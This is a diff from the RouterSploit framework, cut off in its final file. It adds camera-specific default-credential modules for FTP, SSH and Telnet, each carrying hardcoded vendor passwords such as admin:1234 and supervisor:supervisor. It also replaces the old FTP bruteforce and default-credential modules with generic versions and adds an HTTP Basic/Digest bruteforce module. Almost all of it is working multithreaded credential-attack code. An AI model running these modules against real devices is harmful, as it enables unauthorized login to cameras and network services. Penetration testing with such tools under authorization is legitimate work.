+ } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(23, "Target Telnet port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:1111111,admin:4321,root:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/sentry360/__init__.py b/routersploit/modules/creds/cameras/sentry360/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/creds/cameras/sentry360/ftp_default_creds.py b/routersploit/modules/creds/cameras/sentry360/ftp_default_creds.py new file mode 100644 index 000000000..c71069961 --- /dev/null +++ b/routersploit/modules/creds/cameras/sentry360/ftp_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ftp_default import Exploit as FTPDefault + + +class Exploit(FTPDefault): + __info__ = { + "name": "Sentry360 Camera Default FTP Creds", + "description": "Module performs dictionary attack against Sentry360 Camera FTP service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Sentry360 Camera", + ] + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(21, "Target FTP port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:1234", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/sentry360/ssh_default_creds.py b/routersploit/modules/creds/cameras/sentry360/ssh_default_creds.py new file mode 100644 index 000000000..c4b017eb7 --- /dev/null +++ b/routersploit/modules/creds/cameras/sentry360/ssh_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault + + +class Exploit(SSHDefault): + __info__ = { + "name": "Sentry360 Camera Default SSH Creds", + "description": "Module performs dictionary attack against Sentry360 Camera SSH service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit + ], + "devices": [ + "Sentry360 Camera", + ] + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(22, "Target SSH port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:1234", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/sentry360/telnet_default_creds.py b/routersploit/modules/creds/cameras/sentry360/telnet_default_creds.py new file mode 100644 index 000000000..6988d512f --- /dev/null +++ b/routersploit/modules/creds/cameras/sentry360/telnet_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault + + +class Exploit(TelnetDefault): + __info__ = { + "name": "Sentry360 Camera Default Telnet Creds", + "description": "Module performs dictionary attack against Sentry360 Camera Telnet service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Sentry360 Camera", + ] + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(23, "Target Telnet port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:1234", "User:Pass or file with default credentils (file://)") diff --git a/routersploit/modules/creds/cameras/siemens/__init__.py b/routersploit/modules/creds/cameras/siemens/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/creds/cameras/siemens/ftp_default_creds.py b/routersploit/modules/creds/cameras/siemens/ftp_default_creds.py new file mode 100644 index 000000000..220612825 --- /dev/null +++ b/routersploit/modules/creds/cameras/siemens/ftp_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ftp_default import Exploit as FTPDefault + + +class Exploit(FTPDefault): + __info__ = { + "name": "Siemens Camera Default FTP Creds", + "description": "Module performs dictionary attack against Siemens Camera FTP service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Siemens Camera", + ] + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(21, "Target FTP port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/siemens/ssh_default_creds.py b/routersploit/modules/creds/cameras/siemens/ssh_default_creds.py new file mode 100644 index 000000000..3e0621124 --- /dev/null +++ b/routersploit/modules/creds/cameras/siemens/ssh_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault + + +class Exploit(SSHDefault): + __info__ = { + "name": "Siemens Camera Default SSH Creds", + "description": "Module performs dictionary attack against Siemens Camera SSH service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Siemens Camera", + ] + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(22, "Target SSH port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/siemens/telnet_default_creds.py b/routersploit/modules/creds/cameras/siemens/telnet_default_creds.py new file mode 100644 index 000000000..e9e95717f --- /dev/null +++ b/routersploit/modules/creds/cameras/siemens/telnet_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault + + +class Exploit(TelnetDefault): + __info__ = { + "name": "Siemens Camera Default Telnet Creds", + "description": "Module performs dictionary attack against Siemens Camera Telnet service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Siemens Camera", + ] + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(23, "Target Telnet port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/speco/__init__.py b/routersploit/modules/creds/cameras/speco/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/creds/cameras/speco/ftp_default_creds.py b/routersploit/modules/creds/cameras/speco/ftp_default_creds.py new file mode 100644 index 000000000..dc3f36a86 --- /dev/null +++ b/routersploit/modules/creds/cameras/speco/ftp_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ftp_default import Exploit as FTPDefault + + +class Exploit(FTPDefault): + __info__ = { + "name": "Speco Camera Default FTP Creds", + "description": "Module performs dictionary attack against Speco Camera FTP service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Speco Camera", + ] + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(21, "Target FTP port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:1234", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/speco/ssh_default_creds.py b/routersploit/modules/creds/cameras/speco/ssh_default_creds.py new file mode 100644 index 000000000..d30bd3b30 --- /dev/null +++ b/routersploit/modules/creds/cameras/speco/ssh_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault + + +class Exploit(SSHDefault): + __info__ = { + "name": "Speco Camera Default SSH Creds", + "description": "Module performs dictionary attack against Speco Camera SSH service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Speco Camera", + ] + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(22, "Target SSH port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:1234", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/speco/telnet_default_creds.py b/routersploit/modules/creds/cameras/speco/telnet_default_creds.py new file mode 100644 index 000000000..d41585a76 --- /dev/null +++ b/routersploit/modules/creds/cameras/speco/telnet_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault + + +class Exploit(TelnetDefault): + __info__ = { + "name": "Speco Camera Default Telnet Creds", + "description": "Module performs dictionary attack against Speco Camera Telnet service. " + "If valid credentials are found they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Speco Camera", + ] + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(23, "Target Telnet port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:1234", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/stardot/__init__.py b/routersploit/modules/creds/cameras/stardot/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/creds/cameras/stardot/ftp_default_creds.py b/routersploit/modules/creds/cameras/stardot/ftp_default_creds.py new file mode 100644 index 000000000..18edbfe6c --- /dev/null +++ b/routersploit/modules/creds/cameras/stardot/ftp_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ftp_default import Exploit as FTPDefault + + +class Exploit(FTPDefault): + __info__ = { + "name": "Stardot Camera Default FTP Creds", + "description": "Module performs dictionary attack against Stardot Camera FTP service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Stardot Camera", + ] + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(21, "Target FTP port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/stardot/ssh_default_creds.py b/routersploit/modules/creds/cameras/stardot/ssh_default_creds.py new file mode 100644 index 000000000..7f950aff4 --- /dev/null +++ b/routersploit/modules/creds/cameras/stardot/ssh_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault + + +class Exploit(SSHDefault): + __info__ = { + "name": "Stardot Camera Default SSH Creds", + "description": "Module performs dictionary attack against Stardot Camera SSH service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Stardot Camera", + ] + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(22, "Target SSH port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/stardot/telnet_default_creds.py b/routersploit/modules/creds/cameras/stardot/telnet_default_creds.py new file mode 100644 index 000000000..fa59afe6e --- /dev/null +++ b/routersploit/modules/creds/cameras/stardot/telnet_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault + + +class Exploit(TelnetDefault): + __info__ = { + "name": "Stardot Camera Default Telnet Creds", + "description": "Module performs dictionary attack against Stardot Camera Telnet service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Stardot Camera", + ] + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(23, "Target Telnet port") + + threads = OptInteger(1, "Number oof threads") + defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/vacron/__init__.py b/routersploit/modules/creds/cameras/vacron/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/creds/cameras/vacron/ftp_default_creds.py b/routersploit/modules/creds/cameras/vacron/ftp_default_creds.py new file mode 100644 index 000000000..65972049e --- /dev/null +++ b/routersploit/modules/creds/cameras/vacron/ftp_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ftp_default import Exploit as FTPDefault + + +class Exploit(FTPDefault): + __info__ = { + "name": "Vacron Camera Default FTP Creds", + "description": "Module performs dictionary attack against Vacron Camera FTP service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Vacron Cameras", + ], + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(21, "Target FTP port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/vacron/ssh_default_creds.py b/routersploit/modules/creds/cameras/vacron/ssh_default_creds.py new file mode 100644 index 000000000..865f63252 --- /dev/null +++ b/routersploit/modules/creds/cameras/vacron/ssh_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault + + +class Exploit(SSHDefault): + __info__ = { + "name": "Vacron Camera Default SSH Creds", + "description": "Module performs dictionary attack against Vacron Camera SSH service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Vacron Camera", + ], + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(22, "Target SSH port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/vacron/telnet_default_creds.py b/routersploit/modules/creds/cameras/vacron/telnet_default_creds.py new file mode 100644 index 000000000..9abad294f --- /dev/null +++ b/routersploit/modules/creds/cameras/vacron/telnet_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault + + +class Exploit(TelnetDefault): + __info__ = { + "name": "Vacron Camera Default Telnet Creds", + "description": "Module performs dictionary attack against Vacron Camera Telneta service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Vacron Camera", + ], + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(23, "Target Telnet port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/videoiq/__init__.py b/routersploit/modules/creds/cameras/videoiq/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/creds/cameras/videoiq/ftp_default_creds.py b/routersploit/modules/creds/cameras/videoiq/ftp_default_creds.py new file mode 100644 index 000000000..a5f52bf9a --- /dev/null +++ b/routersploit/modules/creds/cameras/videoiq/ftp_default_creds.py @@ -0,0 +1,23 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ftp_default import Exploit as FTPDefault + + +class Exploit(FTPDefault): + __info__ = { + "name": "VideoIQ Camera Default FTP Creds", + "description": "Module performs dictionary attack against VideoIQ Camera FTP service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "VideoIQ Camera", + ], + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(21, "Target FTP port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("supervisor:supervisor", "User:Pass or file with default credentials (file://)") + diff --git a/routersploit/modules/creds/cameras/videoiq/ssh_default_creds.py b/routersploit/modules/creds/cameras/videoiq/ssh_default_creds.py new file mode 100644 index 000000000..b74e0fbf6 --- /dev/null +++ b/routersploit/modules/creds/cameras/videoiq/ssh_default_creds.py @@ -0,0 +1,23 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault + + +class Exploit(SSHDefault): + __info__ = { + "name": "VideoIQ Camera Default SSH Creds", + "description": "Module performs dictionary attack against VideoIQ Camera SSH service." + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit + ], + "devices": [ + "VideoIQ Camera", + ], + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(22, "Target SSH port") + + threads = OptInteger(1, "Number of threads") + default = OptWordlist("supervistor:supervisor", "User:Pass or file with default credentials (file://)") + diff --git a/routersploit/modules/creds/cameras/videoiq/telnet_default_creds.py b/routersploit/modules/creds/cameras/videoiq/telnet_default_creds.py new file mode 100644 index 000000000..1cb52e2f8 --- /dev/null +++ b/routersploit/modules/creds/cameras/videoiq/telnet_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault + + +class Exploit(TelnetDefault): + __info__ = { + "name": "VideoIQ Camera Default Telnet Creds", + "description": "Module performs dictionary attack against VideoIQ Camera Telnet service. " + "If valid credentials are found, they ar displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "VideoIQ Cameras", + ], + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(23, "Target Telnet port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("supervisor:supervisor", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/ftp_bruteforce.py b/routersploit/modules/creds/ftp_bruteforce.py deleted file mode 100644 index 23d02d9ba..000000000 --- a/routersploit/modules/creds/ftp_bruteforce.py +++ /dev/null @@ -1,129 +0,0 @@ -import threading -import ftplib -import socket -import itertools - -from routersploit import ( - exploits, - wordlists, - print_status, - print_error, - LockedIterator, - print_success, - print_table, - boolify, - multi, -) - - -class Exploit(exploits.Exploit): - """ - Module performs bruteforce attack against FTP service. - If valid credentials are found, they are displayed to the user. - """ - __info__ = { - 'name': 'FTP Bruteforce', - 'description': 'Module performs bruteforce attack against FTP service.' - 'If valid credentials are found, they are displayed to the user.', - 'authors': [ - 'Marcin Bury ', # routersploit module - ], - 'references': [ - '', - ], - 'devices': [ - 'Multi', - ], - } - - target = exploits.Option('', 'Target IP address or file with target:port (file://)') - port = exploits.Option(21, 'Target port') - - threads = exploits.Option(8, 'Number of threads') - usernames = exploits.Option('admin', 'Username or file with usernames (file://)') - passwords = exploits.Option(wordlists.passwords, 'Password or file with passwords (file://)') - verbosity = exploits.Option('yes', 'Display authentication attempts') - stop_on_success = exploits.Option('yes', 'Stop on first valid authentication attempt') - - credentials = [] - - def run(self): - self.credentials = [] - self.attack() - - @multi - def attack(self): - ftp = ftplib.FTP() - try: - ftp.connect(self.target, port=int(self.port), timeout=10) - except (socket.error, socket.timeout): - print_error("Connection error: %s:%s" % (self.target, str(self.port))) - ftp.close() - return - except Exception: - pass - ftp.close() - - if self.usernames.startswith('file://'): - usernames = open(self.usernames[7:], 'r') - else: - usernames = [self.usernames] - - if self.passwords.startswith('file://'): - passwords = open(self.passwords[7:], 'r') - else: - passwords = [self.passwords] - - collection = LockedIterator(itertools.product(usernames, passwords)) - - self.run_threads(self.threads, self.target_function, collection) - - if len(self.credentials): - print_success("Credentials found!") - headers = ("Target", "Port", "Login", "Password") - print_table(headers, *self.credentials) - else: - print_error("Credentials not found") - - def target_function(self, running, data): - module_verbosity = boolify(self.verbosity) - name = threading.current_thread().name - - print_status(name, 'process is starting...', verbose=module_verbosity) - - ftp = ftplib.FTP() - while running.is_set(): - try: - user, password = data.next() - user = user.strip() - password = password.strip() - except StopIteration: - break - else: - retries = 0 - while retries < 3: - try: - ftp.connect(self.target, port=int(self.port), timeout=10) - break - except (socket.error, socket.timeout): - print_error("{} Connection problem. Retrying...".format(name), verbose=module_verbosity) - retries += 1 - - if retries > 2: - print_error("Too much connection problems. Quiting...", verbose=module_verbosity) - return - - try: - ftp.login(user, password) - - if boolify(self.stop_on_success): - running.clear() - - print_success("Target: {}:{} {}: Authentication succeed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity) - self.credentials.append((self.target, self.port, user, password)) - except Exception: - print_error("Target: {}:{} {}: Authentication Failed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity) - - ftp.close() - - print_status(name, 'process is terminated.', verbose=module_verbosity) diff --git a/routersploit/modules/creds/ftp_default.py b/routersploit/modules/creds/ftp_default.py deleted file mode 100644 index 3e45f65af..000000000 --- a/routersploit/modules/creds/ftp_default.py +++ /dev/null @@ -1,121 +0,0 @@ -import threading -import ftplib -import socket - -from routersploit import ( - exploits, - wordlists, - print_status, - print_error, - LockedIterator, - print_success, - print_table, - boolify, - multi, -) - - -class Exploit(exploits.Exploit): - """ - Module perform dictionary attack with default credentials against FTP service. - If valid credentials are found, they are displayed to the user. - """ - __info__ = { - 'name': 'FTP Default Creds', - 'description': 'Module perform dictionary attack with default credentials against FTP service. ' - 'If valid credentials are found, they are displayed to the user.', - 'authors': [ - 'Marcin Bury ' # routersploit module - ], - 'references': [ - '', - ], - 'devices': [ - 'Multi', - ], - } - - target = exploits.Option('', 'Target IP address or file with target:port (file://)') - port = exploits.Option(21, 'Target port') - - threads = exploits.Option(8, 'Numbers of threads') - defaults = exploits.Option(wordlists.defaults, 'User:Pass pair or file with default credentials (file://)') - verbosity = exploits.Option('yes', 'Display authentication attempts') - stop_on_success = exploits.Option('yes', 'Stop on first valid authentication attempt') - - credentials = [] - - def run(self): - self.credentials = [] - self.attack() - - @multi - def attack(self): - ftp = ftplib.FTP() - try: - ftp.connect(self.target, port=int(self.port), timeout=10) - except (socket.error, socket.timeout): - print_error("Connection error: %s:%s" % (self.target, str(self.port))) - ftp.close() - return - except Exception: - pass - ftp.close() - - if self.defaults.startswith('file://'): - defaults = open(self.defaults[7:], 'r') - else: - defaults = [self.defaults] - - collection = LockedIterator(defaults) - self.run_threads(self.threads, self.target_function, collection) - - if len(self.credentials): - print_success("Credentials found!") - headers = ("Target", "Port", "Login", "Password") - print_table(headers, *self.credentials) - else: - print_error("Credentials not found") - - def target_function(self, running, data): - module_verbosity = boolify(self.verbosity) - name = threading.current_thread().name - - print_status(name, 'process is starting...', verbose=module_verbosity) - - ftp = ftplib.FTP() - while running.is_set(): - try: - line = data.next().split(":") - user = line[0].strip() - password = line[1].strip() - except StopIteration: - break - else: - retries = 0 - while retries < 3: - try: - ftp.connect(self.target, port=int(self.port), timeout=10) - break - except Exception: - print_error("{} Connection problem. Retrying...".format(name), verbose=module_verbosity) - retries += 1 - - if retries > 2: - print_error("Too much connection problems. Quiting...", verbose=module_verbosity) - return - - try: - ftp.login(user, password) - - if boolify(self.stop_on_success): - running.clear() - - print_success("Target: {}:{} {}: Authentication Succeed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity) - self.credentials.append((self.target, self.port, user, password)) - except Exception: - print_error("Target: {}:{} {}: Authentication Failed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity) - - ftp.close() - - print_status(name, 'process is terminated.', verbose=module_verbosity) diff --git a/routersploit/modules/creds/generic/__init__.py b/routersploit/modules/creds/generic/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/creds/generic/ftp_bruteforce.py b/routersploit/modules/creds/generic/ftp_bruteforce.py new file mode 100644 index 000000000..d75f9a72d --- /dev/null +++ b/routersploit/modules/creds/generic/ftp_bruteforce.py @@ -0,0 +1,93 @@ +import itertools +from routersploit.core.exploit import * +from routersploit.core.ftp.ftp_client import FTPClient +from routersploit.resources import wordlists + + +class Exploit(FTPClient): + __info__ = { + "name": "FTP Bruteforce", + "description": "Module performs bruteforce attack against FTP service." + "If valid credentials are found, the are displayed to the user.", + "authors": ( + "Marcin Bury " # routersploit module + ), + } + + target = OptIP("", "Target IPv4, IPv6 or file with ip:port (file://)") + port = OptPort(21, "Target FTP port") + + threads = OptInteger(8, "Number of threads") + usernames = OptWordlist("admin", "Username or file with usernames (file://)") + passwords = OptWordlist(wordlists.passwords, "Password or file with passwords (file://)") + + verbosity = OptBool("true", "Display authentication attempts") + stop_on_success = OptBool("true", "Stop on first valid authentication attempt") + + def run(self): + self.credentials = [] + self.attack() + + @multi + def attack(self): + if not self.check(): + return + + print_status("Starting bruteforce attack against FTP service") + + data = LockedIterator(itertools.product(self.usernames, self.passwords)) + self.run_threads(self.threads, self.target_function, data) + + if self.credentials: + print_success("Credentials found!") + headers = ("Target", "Port", "Service", "Username", "Password") + print_table(headers, *self.credentials) + else: + print_error("Credentials not found") + + def target_function(self, running, data): + while running.is_set(): + try: + username, password = data.next() + except StopIteration: + break + else: + ftp = self.ftp_connect(retries=3) + if ftp is None: + print_error("Too many connections problems. Quiting...", verbose=self.verbosity) + return + + try: + ftp.login(username, password) + + if self.stop_on_success: + running.clear() + + print_success("Authenticated Succeed - Username: '{}' Password: '{}'".format(username, password), verbose=self.verbosity) + self.credentials.append((self.target, self.port, self.target_protocol, username, password)) + + except Exception as err: + print_error("Authentication Failed - Username: '{}' Password: '{}'".format(username, password), verbose=self.verbosity) + + ftp.close() + + def check(self): + if self.ftp_test_connect(): + print_status("Target exposes FTP service", verbose=self.verbosity) + return True + + print_status("Target does not expose FTP service", verbose=self.verbosity) + return False + + @mute + def check_default(self): + if self.check(): + self.credentials = [] + + data = LockedIterator(itertools.product(self.usernames, self.passwords)) + self.run_threads(self.threads, self.target_function, data) + + if self.credentials: + return self.credentials + + return None diff --git a/routersploit/modules/creds/generic/ftp_default.py b/routersploit/modules/creds/generic/ftp_default.py new file mode 100644 index 000000000..de2635b1c --- /dev/null +++ b/routersploit/modules/creds/generic/ftp_default.py @@ -0,0 +1,91 @@ +from routersploit.core.exploit import * +from routersploit.core.ftp.ftp_client import FTPClient +from routersploit.resources import wordlists + + +class Exploit(FTPClient): + __info__ = { + "name": "FTP Default Creds", + "description": "Module performs dictionary attack with default credentials against FTP service." + "If valid credentials are found, the are displayed to the user.", + "authors": ( + "Marcin Bury " # routersploit module + ), + } + + target = OptIP("", "Target IPv4, IPv6 or file with ip:port (file://)") + port = OptPort(21, "Target FTP port") + + threads = OptInteger(8, "Number of threads") + defaults = OptWordlist(wordlists.defaults, "User:Pass pair or file with default credentials (file://)") + + verbosity = OptBool("true", "Display authentication attempts") + stop_on_success = OptBool("true", "Stop on first valid authentication attempt") + + def run(self): + self.credentials = [] + self.attack() + + @multi + def attack(self): + if not self.check(): + return + + print_status("Starting attack against FTP service") + + data = LockedIterator(self.defaults) + self.run_threads(self.threads, self.target_function, data) + + if self.credentials: + print_success("Credentials found!") + headers = ("Target", "Port", "Service", "Username", "Password") + print_table(headers, *self.credentials) + else: + print_error("Credentials not found") + + def target_function(self, running, data): + while running.is_set(): + try: + username, password = data.next().split(":") + except StopIteration: + break + else: + ftp = self.ftp_connect(retries=3) + if ftp is None: + print_error("Too many connections problems. Quiting...", verbose=self.verbosity) + return + + try: + ftp.login(username, password) + + if self.stop_on_success: + running.clear() + + print_success("Authenticated Succeed - Username: '{}' Password: '{}'".format(username, password), verbose=self.verbosity) + self.credentials.append((self.target, self.port, self.target_protocol, username, password)) + + except Exception as err: + print_error("Authentication Failed - Username: '{}' Password: '{}'".format(username, password), verbose=self.verbosity) + + ftp.close() + + def check(self): + if self.ftp_test_connect(): + print_status("Target exposes FTP service", verbose=self.verbosity) + return True + + print_status("Target does not expose FTP service", verbose=self.verbosity) + return False + + @mute + def check_default(self): + if self.check(): + self.credentials = [] + + data = LockedIterator(self.defaults) + self.run_threads(self.threads, self.target_function, data) + + if self.credentials: + return self.credentials + + return None diff --git a/routersploit/modules/creds/generic/http_basic_digest_bruteforce.py b/routersploit/modules/creds/generic/http_basic_digest_bruteforce.py new file mode 100644 index 000000000..07101b4c3 --- /dev/null +++ b/routersploit/modules/creds/generic/http_basic_digest_bruteforce.py @@ -0,0 +1,117 @@ +import itertools +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient +from routersploit.resources import wordlists +from requests.auth import HTTPDigestAuth + + +class Exploit(HTTPClient): + __info__ = { + "name": "HTTP Basic/Digest Bruteforce", + "description": "Module performs bruteforce attack against HTTP Basic/Digest Auth service. " + "If valid credentials are found, they are displayed to the user.", + "authors": ( + "Marcin Bury ", # routersploit module + "Alexander Yakovlev ", # upgrading to perform bruteforce attack against HTTP Digest Auth service + ) + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(80, "Target HTTP port") + + threads = OptInteger(8, "Number of threads") + + usernames = OptWordlist("admin", "Username or file with usernames (file://)") + passwords = OptWordlist(wordlists.passwords, "Password or file with passwords (file://)") + + path = OptString("/", "URL Path") + + verbosity = OptBool("true", "Display authentication attempts") + stop_on_success = OptBool("true", "Stop on first valid authentication attempt") + + def run(self): + self.credentials = [] + self.auth_type = None + + self.attack() + + @multi + def attack(self): + if not self.check(): + return + + print_status("Starting bruteforce attack against {}".format(self.path)) + + data = LockedIterator(itertools.product(self.usernames, self.passwords)) + self.run_threads(self.threads, self.target_function, data) + + if self.credentials: + print_success("Credentials found!") + headers = ("Target", "Port", "Service", "Username", "Password") + print_table(headers, *self.credentials) + else: + print_error("Credentials not found") + + def target_function(self, running, data): + while running.is_set(): + try: + username, password = data.next() + + if self.auth_type == "digest": + auth = HTTPDigestAuth(username, password) + else: + auth = (username, password) + + response = self.http_request( + method="GET", + path=self.path, + auth=auth, + ) + + if response is not None and response.status_code != 401: + if self.stop_on_success: + running.clear() + + print_success("Authentication Succeed - Username: '{}' Password: '{}'".format(username, password), verbose=self.verbosity) + self.credentials.append((self.target, self.port, self.target_protocol, username, password)) + else: + print_error("Authentication Failed - Username: '{}' Password: '{}'".format(username, password), verbose=self.verbosity) + except StopIteration: + break + + def check(self): + response = self.http_request( + method="GET", + path=self.path + ) + + if response is None: + return False + + if response.status_code != 401 or "WWW-Authenticate" not in response.headers.keys(): + print_error("Resource {} is not protected by Basic/Digest 